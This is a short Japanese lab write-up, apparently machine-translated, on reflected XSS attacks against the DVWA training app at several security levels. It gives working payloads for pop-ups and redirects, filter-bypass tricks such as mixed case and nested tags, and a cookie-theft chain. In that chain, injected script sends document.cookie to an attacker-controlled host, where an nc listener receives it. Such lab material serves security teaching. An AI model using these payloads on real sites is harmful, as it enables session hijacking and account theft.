DVWAのXSSクロスサイトスクリプティング攻撃(リフレクションタイプ)
環境と原則
環境: kali linux、dvwa、攻撃マシン(win10)、攻撃マシン(win xp)
原理
1.ポップアップ
2.リダイレクト
3.Cookieを取得する
下層階級
1つのポップアップウィンドウ
js悪意のあるコード:
# 直接嵌入
<script>alert('xss')</script>
# 元素事件
<body onload = alert('xss')>
<img src = '' onerror = alert('xss')>
<a href = '' onclick = alert('xss')>type</a>
悪意のあるコードを挿入します。悪意のあるコード
が挿入されたページに戻ります。
攻撃された人にURLを送信します。攻撃された人はページを開き、XSSをトリガーします。
2、リダイレクト
js悪意のあるコード:
<script>window.location = "http://www.baidu.com"</script>
jsページに戻り、
攻撃者に送信します:攻撃者がURLを開きます:
リダイレクトが発生します
3、クッキーを取得します
js悪意のあるコード:
<script>alert(document.cookie)</script>
<script src='http://xxxxx/a.js'></script>
kaililinuxの/ var / www / html /ディレクトリに.jsファイルを作成します。内容は次のとおりです。
var img = new Image();
img.src='http://ip地址:端口/cookie.php?cookie='+document.cookie;
悪意のあるコードを挿入してページに戻り、攻撃されたマシンを使用してURLにアクセスします
kalil inuxを開き、nc -vnlp 88を使用してポート88を監視します:
Cookieを返します
中級
ソースコード:<script>タグはフィルタリングされています。
他のタグを使用してXSSにタッチするか、大文字と小文字を混在させてバイパスすることができます。
<sCriPt>alert('xss')</script>
二重書き込みバイパス
<sc<script>ript>alert('xss')</script>
成功触法:
高いレベル
ソースコード:<script>タグの定期的なマッチングとフィルタリング。
他のタグを使用してバイパスします。
<body onload = alert('xss')>
<img src = '' onerror = alert('xss')>
<a href = '' onclick = alert('xss')>type</a>